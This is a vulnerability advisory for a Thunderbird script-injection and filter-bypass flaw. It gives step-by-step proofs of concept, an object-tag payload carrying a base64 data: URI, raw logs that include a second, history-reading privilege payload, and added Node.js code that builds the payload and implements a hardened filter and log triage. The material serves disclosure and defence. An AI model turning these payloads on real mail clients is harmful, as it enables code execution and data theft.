Proof of Concept (PoC):
=======================
The filter bypass and persistent script code injection vulnerabilities can be exploited by remote attackers without a privileged user account and with little user interaction: in PoC #1 the recipient only has to open the message and click Reply, and in PoC #2 and #3 the payload fires as soon as a compose window opens. For security demonstration or to reproduce the vulnerability, follow the steps and information below.

Proof of Concept #1
a) Create a new email message.
b) In the body text, insert a new HTML tag carrying the PoC "Payload".
c) Send the email to the victim.
d) Open the new email in the victim's Thunderbird and click Reply.
e) A JavaScript alert window appears, proving the existence of this vulnerability.

Proof of Concept #2
a) Go to Tools and then Account Settings.
b) Under Signature Text, insert the payload and enable 'Use HTML'.
c) Close the menu and click "Write" to create a new email.
d) The popup appears the moment the new email editor window opens, proving the existence of this vulnerability.

Proof of Concept #3
a) Create a new text file on your desktop (local computer), insert the PoC payload into it and save it as test.html (HTML).
b) Go to Tools and then Account Settings.
c) Below the Signature Text box, enable 'Attach the signature from a file instead'.
d) Click Choose and select the 'test.html' file created in step a.
e) Click Write; the JavaScript popup appears, proving the existence of this vulnerability.

Payload #1
(The markup was stripped from this copy of the advisory; the form below is reconstructed from the description in 1.3 and the data: URL recorded in the logs in 1.5.)
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4="></object>

Payload #2

1.3 POC Technical Description:
Here, the data URI payload is used as the value of the 'data' attribute of an 'object' tag. The object tag embeds external resources such as images, audio, video, Java applets, ActiveX controls, PDF and Flash content, and its 'data' attribute holds the URL from which that resource is loaded.
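The construction described above, as an added example that is not part of the original advisory: it builds the object/data: URI payload from the decoded script, shows that a blacklist which only inspects the literal markup does not see the script, and shows a check that decodes data: URIs before scanning. The blacklist patterns are an assumption standing in for the application filter, whose exact rules the advisory does not give. Runs under Node.js.

```javascript
// Added example (not code from the advisory or from Mozilla). Node.js: Buffer
// does the base64 work, nothing else is required.

// Decoded form of the advisory's base64 payload.
const SCRIPT_BODY =
  '<script>alert("Mozilla-Thunderbird-Script-Code-Injection-POC-Ateeq-Khan");</script>';

// Base64 string exactly as printed in the advisory.
const ADVISORY_B64 =
  'PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=';

function toBase64(text) {
  return Buffer.from(text, 'utf8').toString('base64');
}

// Wrap an HTML document in an <object> whose data attribute is a base64
// text/html data: URI, the construction the advisory describes.
function buildObjectPayload(html) {
  return `<object data="data:text/html;base64,${toBase64(html)}"></object>`;
}

// ASSUMED shape of the "application blacklist filter" the advisory says was
// bypassed: patterns matched against the raw markup only.
const BLACKLIST = [/<script\b/i, /\bon[a-z]+\s*=/i, /javascript:/i];

function naiveBlacklistRejects(html) {
  return BLACKLIST.some((re) => re.test(html));
}

// Parse a data: URI into its media type and decoded body. Whitespace inside a
// base64 body is dropped because mail and log line wrapping inserts it.
function decodeDataUri(uri) {
  const m = /^data:([^;,]*)((?:;[^;,]*)*),([\s\S]*)$/i.exec(uri);
  if (!m) return null;
  const mime = (m[1] || 'text/plain').toLowerCase();
  const base64 = /;base64/i.test(m[2]);
  let body;
  try {
    body = base64
      ? Buffer.from(m[3].replace(/\s+/g, ''), 'base64').toString('utf8')
      : decodeURIComponent(m[3]);
  } catch (e) {
    return null; // malformed percent-encoding
  }
  return { mime, base64, body };
}

// Every data: URI used as a resource reference in the markup.
const DATA_URI_ATTR = /\b(?:data|src|href)\s*=\s*["']?\s*(data:[^"'\s>]+)/gi;

// Hardened check: apply the literal blacklist, then reject any data: URI whose
// media type can carry script, and rescan decoded bodies recursively so a
// nested encoding cannot hide a payload either.
function hardenedRejects(html, depth = 0) {
  if (depth > 4) return true; // refuse absurdly deep nesting
  if (naiveBlacklistRejects(html)) return true;
  for (const m of html.matchAll(DATA_URI_ATTR)) {
    const d = decodeDataUri(m[1]);
    if (d === null) return true; // unparsable data: URI is treated as hostile
    if (/html|xml|javascript|ecmascript/.test(d.mime)) return true;
    if (hardenedRejects(d.body, depth + 1)) return true;
  }
  return false;
}

// Stand-alone run: print the payload and what each filter decides.
if (typeof require !== 'undefined' && require.main === module) {
  const payload = buildObjectPayload(SCRIPT_BODY);
  console.log(payload);
  console.log('naive blacklist rejects:', naiveBlacklistRejects(payload));
  console.log('hardened check rejects:', hardenedRejects(payload));
}
```

The hardened check rejects by media type before looking at the decoded body, so a text/html data: document is refused even when its script is obfuscated further; the recursion matters because a text/plain data: body can itself contain another object tag.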
Data in the "data:" URI is carried inline, here as a base64 string:

Base64-encoded payload:
PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=

Base64-decoded payload:
<script>alert("Mozilla-Thunderbird-Script-Code-Injection-POC-Ateeq-Khan");</script>

When the HTML editor loads the object tag, it fetches the resource named by the data attribute. Here that resource is a text/html document containing our script; it is loaded as a framed document (the "character encoding of a framed document was not declared" warnings for the data: URL in the logs in 1.5 record this) and the script executes in the compose window. The application blacklist filter only inspects the literal markup, which contains no <script> tag: the script exists only inside the base64 body of the data: URI, which the filter does not decode. That is why the base64-encoded payload bypasses it.

1.4 Email Header showing the hidden malicious payload

Message-ID: <5195AABB.9000409@ccure.it>
Date: Fri, 17 May 2013 08:57:47 +0500
From: Ateeq Khan
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20130509 Thunderbird/17.0.6
MIME-Version: 1.0
To: ateeq
Subject: Test
X-Enigmail-Version: 1.5.1
Content-Type: multipart/alternative; boundary="------------070707070308040102070208"
X-Provags-ID: V02:K0:x1sxyB72JjArK0t7OpMGlUdnbY0vjneQvJdkX/twIfw
 QgzRaY5JN/SeFJ/fl2yULg+LJCKojYYGFR/8wrcS9hv6B6WWrN
 mur6d1IsxEn2D2kZt5fQ3tk8Z1qDiEpN5C7vrtOyEFAMJR3NHg
 jsL6elL9oxDkDRj1rYWvipndH1vonoPT3kjbcmuPsEZwYZ0JkL
 BjvA5CQE3qDMPgd5nzdT8SqKBRrj9u7m/irxCWHeJcnAG0XBnK
 txadh05EhpYjzrsz2kd+EyQe8ABh9F+yHQs6PBgIJeMDhm3EmY
 KPDb5TDHAsnDSD7e3jSaj1t/jhHWc4OA+Okkw+PsyBasdNvzw= =
X-UI-Junk: AutoNotJunk -999 (UWL); V01:9SSPrMSv:3OJduITnBKJW2sO9FDRIJW8REKQH86F2DhxLUWcUUFzS1g0JhJ7
 GgRkniiwfqYstxpjhSj957gz/8tEx07A4XeXZriK0TD0WhS1DXezTz/TtZsDYDEh
 hoWYOFl3bb5yC2QDLQsFZpUW8W11Q1ueL83Jxhvv1UmeH1zGnYFLHhAFOpzxH4jN
 652vXWc8dXjmX/WjTrvcI6NDjWdTTTfnDoO2PVFxLR+Tspu5HEv+SDuyrKv18Pei
 ogK+aeYsHnGw+Sv4tyfEE3I/nLbDefudGihBnld6s0loLxOOAGeIYxOeZ4Je+v0h
 MH9Y6ICIP7qvG/CkWt1PYQDzeNRPMANzlOgD/c//0kMjpKd6GwFWZIgfLyEFGGGA
 5ghpw5skyHXrAcf+FBq4ayJpL2UIfGeghWw==
X-Nemesis-Spam: whitelist
Envelope-To: ateeq@ccure.it

This is a multi-part message in MIME format.
--------------070707070308040102070208
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

--

--------------070707070308040102070208
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
--
--------------070707070308040102070208--

1.5 Interesting Raw Application Logs captured during the entire process of testing:

(4fbc.3828): Break instruction exception - code 80000003 (first chance)
eax=fff82000 ebx=00000000 ecx=00000000 edx=7792f85a esi=00000000 edi=00000000
eip=778a000c esp=0ffffd94 ebp=0ffffdc0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!DbgBreakPoint:
778a000c cc              int     3
0:040> g
[JavaScript Error: "Search service falling back to synchronous initialization at SRCH_SVC__ensureInitialized@resource:///components/nsSearchService.js:2498 @resource:///components/nsSearchService.js:3476 _adjustAcItem@chrome://messenger/content/webSearch.xml:42 @chrome://messenger/content/webSearch.xml:22 " {file: "resource:///components/nsSearchService.js" line: 2499}]
[JavaScript Error: "2013-05-18 06:02:42 gloda.datastore ERROR Async queryFromQuery error: 1: malformed MATCH expression: [" :: line 2790" data: no]" {file: "chrome://global/content/globalOverlay.js" line: 95}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" line: 1736}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" line: 1736}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/folderDisplay.js" line: 2342}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/folderDisplay.js" line: 2342}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" line: 1736}]
[JavaScript Error: "IndexSizeError: Index or size is negative or greater than the allowed amount" {file: "chrome://messenger/content/glodaFacetBindings.xml" line: 1736}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messenger.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messenger.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/folderDisplay.js" line: 1621}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://global/content/bindings/toolbar.xml" line: 276}]
"chrome://global/content/bindings/general.xml" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
No chrome package registered for chrome://navigator/content/navigator.xul
[JavaScript Error: "NS_ERROR_FAILURE: Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIDOMJSWindow.open]" {file: "data:text/html;base64, PFNDUklQVD4KdmFyIHdpbiA9IHdpbmRvdy5vcGVuKCk7Cm5ldHNjYXBlLnNlY3VyaXR5LlByaXZpbGVnZU1hbmFnZXIuZW5hYmxlUHJpdmlsZWdlKAogIlVuaXZlcnNhbEJyb3dzZXJBY2Nlc3MiKTsKZm9 yICh2YXIgaT0wOyBpIDwgaGlzdG9yeS5sZW5ndGg7IGkrKykgewogd2luLmRvY3VtZW50LndyaXRlbG4oaGlzdG9yeVtpXSArICI8QlI+Iik7Cn0KbmV0c2NhcGUuc2VjdXJpdHkuUHJpdmlsZWdlTWFuYW dlci5yZXZlcnRQcml2aWxlZ2UoCiAiVW5pdmVyc2FsQnJvd3NlckFjY2VzcyIpOwp3aW4uY2xvc2UoKTsKPC9TQ1JJUFQ+" line: 2}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
No chrome package registered for chrome://navigator/content/navigator.xul
[JavaScript Error: "NS_ERROR_FAILURE: Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIDOMJSWindow.open]" {file: "data:text/html;base64, PFNDUklQVD4KdmFyIHdpbiA9IHdpbmRvdy5vcGVuKCk7Cm5ldHNjYXBlLnNlY3VyaXR5LlByaXZpbGVnZU1hbmFnZXIuZW5hYmxlUHJpdmlsZWdlKAogIlVuaXZlcnNhbEJyb3dzZXJBY2Nlc3MiKTsKZm9y ICh2YXIgaT0wOyBpIDwgaGlzdG9yeS5sZW5ndGg7IGkrKykgewogd2luLmRvY3VtZW50LndyaXRlbG4oaGlzdG9yeVtpXSArICI8QlI+Iik7Cn0KbmV0c2NhcGUuc2VjdXJpdHkuUHJpdmlsZWdlTWFuYWdl ci5yZXZlcnRQcml2aWxlZ2UoCiAiVW5pdmVyc2FsQnJvd3NlckFjY2VzcyIpOwp3aW4uY2xvc2UoKTsKPC9TQ1JJUFQ+" line: 2}]
[JavaScript Error: "An error occurred executing the cmd_insertHTMLWithDialog command: [Exception... "Could not convert Native argument arg 3 [nsIDOMJSWindow.openDialog]" nsresult: "0x8057000a (NS_ERROR_XPC_BAD_CONVERT_NATIVE)" location: "JS frame :: chrome://editor/content/ComposerCommands.js :: :: line 2790" data: no]" {file: "chrome://global/content/globalOverlay.js" line: 95}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
Security Error: Content at moz-nullprincipal:{37db781d-d6d3-44bb-ade4-a79dcc63c0dd} may not load or link to about:blank.
Security Error: Content at moz-nullprincipal:{44bab10a-4bd8-4cfb-a519-eb2535344039} may not load or link to about:blank
[JavaScript Error: "[Exception... "'DB failed getting form autocomplete values' when calling method: [nsIFormAutoComplete::autoCompleteSearch]" nsresult: "0x8057001e (NS_ERROR_XPC_JS_THREW_STRING)" location: "" data: no]"]
[JavaScript Error: "aSubject.popup is undefined" {file: "resource:///modules/glodaWebSearch.js" line: 68}]
[JavaScript Warning: "The stylesheet data:,*%7bx:askjnexpression(write(2))%7D was loaded as CSS even though its MIME type, "text/plain", is not "text/css"." {file: "about:blank" line: 0}]
[JavaScript Warning: "Unknown property 'x'. Declaration dropped." {file: "data:,*%7bx:askjnexpression(write(2))%7D" line: 1]
[JavaScript Error: "GenericSendMessage FAILED: [Exception... "Component returned failure code: 0x8055311a [nsIMsgCompose.SendMsg]" nsresult: "0x8055311a ()" location: "JS frame :: chrome://messenger/content/messengercompose/MsgComposeCommands.js :: GenericSendMessage :: line 2814" data: no]" {file: "chrome://messenger/content/messengercompose/MsgComposeCommands.js" line: 2817}]
"chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "Use of attributes' nodeValue attribute is deprecated. Use value instead." {file: "chrome://messenger/content/messengercompose/MsgComposeCommands.js" line: 3996}]
Security Error: Content at moz-nullprincipal:{549c3f5a-560d-4469-9b0f-09f598998b0b} may not load or link to about:blank.
Security Error: Content at moz-nullprincipal:{63e416e7-9cc4-458f-b93d-882bb2ad9121} may not load or link to about:blank.
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block." {file: "chrome://global/content/bindings/general.xml" line: 0}]
[JavaScript Error: "Search service falling back to synchronous initialization at SRCH_SVC__ensureInitialized@resource:///components/nsSearchService.js:2498 @resource:///components/nsSearchService.js:3476 _adjustAcItem@chrome://messenger/content/webSearch.xml:42 @chrome://messenger/content/webSearch.xml:22
[JavaScript Warning: "The stylesheet data:,*%7bx:askjnexpression(write(2))%7D was loaded as CSS even though its MIME type, "text/plain", is not "text/css"." {file: "about:blank" line: 0}]

The data: stylesheet was loaded as CSS even though its MIME type was text/plain and it should not have been.
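As an added example that is not part of the original advisory: a Node.js triage helper that pulls every data: URI out of console log lines like the ones above and decodes it, so a responder reads the markup that was actually loaded instead of a base64 blob. The sample lines are copied from the log excerpt above. Applied to them it recovers the alert() payload from the framed-document warnings and a second document, recorded in the nsIDOMJSWindow.open errors, whose decoded body calls window.open() and netscape.security.PrivilegeManager.enablePrivilege("UniversalBrowserAccess"). The spaces inside that second base64 body are wrapping artefacts, so the decoder strips whitespace before decoding.

```javascript
// Added example (not code from the advisory or from Mozilla). Node.js only.

// Lines copied from the advisory's log excerpt. The framed-document warning is
// listed twice because the log repeats it; the nsIDOMJSWindow.open line keeps
// the spaces that line wrapping inserted into its base64 body.
const FRAMED_WARNING =
  '[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it." {file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]';
const WINDOW_OPEN_ERROR =
  '[JavaScript Error: "NS_ERROR_FAILURE: Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIDOMJSWindow.open]" {file: "data:text/html;base64, PFNDUklQVD4KdmFyIHdpbiA9IHdpbmRvdy5vcGVuKCk7Cm5ldHNjYXBlLnNlY3VyaXR5LlByaXZpbGVnZU1hbmFnZXIuZW5hYmxlUHJpdmlsZWdlKAogIlVuaXZlcnNhbEJyb3dzZXJBY2Nlc3MiKTsKZm9 yICh2YXIgaT0wOyBpIDwgaGlzdG9yeS5sZW5ndGg7IGkrKykgewogd2luLmRvY3VtZW50LndyaXRlbG4oaGlzdG9yeVtpXSArICI8QlI+Iik7Cn0KbmV0c2NhcGUuc2VjdXJpdHkuUHJpdmlsZWdlTWFuYW dlci5yZXZlcnRQcml2aWxlZ2UoCiAiVW5pdmVyc2FsQnJvd3NlckFjY2VzcyIpOwp3aW4uY2xvc2UoKTsKPC9TQ1JJUFQ+" line: 2}]';
const STYLESHEET_WARNING =
  '[JavaScript Warning: "The stylesheet data:,*%7bx:askjnexpression(write(2))%7D was loaded as CSS even though its MIME type, "text/plain", is not "text/css"." {file: "about:blank" line: 0}]';

const LOG_LINES = [FRAMED_WARNING, FRAMED_WARNING, WINDOW_OPEN_ERROR, STYLESHEET_WARNING];

// A data: URI quoted in a file: field may contain wrap whitespace, so take it
// up to the closing quote; a bare one inside message text ends at whitespace.
const QUOTED_URI = /"(data:[^"]*)"/g;
const BARE_URI = /data:[^\s"]+/g;

function extractDataUris(line) {
  const uris = [...line.matchAll(QUOTED_URI)].map((m) => m[1]);
  const rest = line.replace(QUOTED_URI, '""');
  for (const m of rest.matchAll(BARE_URI)) uris.push(m[0]);
  return uris;
}

// Split a data: URI at its first comma, drop wrap whitespace, and decode the
// body according to the header (";base64" or percent-encoding).
function decodeDataUri(uri) {
  const comma = uri.indexOf(',');
  const params = uri.slice('data:'.length, comma).toLowerCase().split(';');
  const raw = uri.slice(comma + 1).replace(/\s+/g, '');
  const base64 = params.includes('base64');
  const mime = params[0] || 'text/plain';
  const body = base64
    ? Buffer.from(raw, 'base64').toString('utf8')
    : decodeURIComponent(raw);
  return { mime, base64, body };
}

// Walk the log, decode each distinct data: URI once and count its occurrences.
function triageLog(lines) {
  const byUri = new Map();
  lines.forEach((line, index) => {
    for (const uri of extractDataUris(line)) {
      const key = uri.replace(/\s+/g, '');
      const entry = byUri.get(key) || { ...decodeDataUri(uri), count: 0, firstLine: index + 1 };
      entry.count += 1;
      byUri.set(key, entry);
    }
  });
  return [...byUri.values()];
}

// Coarse verdict on a decoded body: does it carry script or privilege calls?
function looksLikeScript(body) {
  return /<script\b/i.test(body) || /enablePrivilege|javascript:/i.test(body);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const p of triageLog(LOG_LINES)) {
    console.log(`${p.mime} base64=${p.base64} x${p.count} first line ${p.firstLine} script=${looksLikeScript(p.body)}`);
    console.log(p.body);
  }
}
```

Keying the map on the whitespace-stripped URI is what lets the two differently wrapped copies of the same nsIDOMJSWindow.open payload in the full log collapse into one entry.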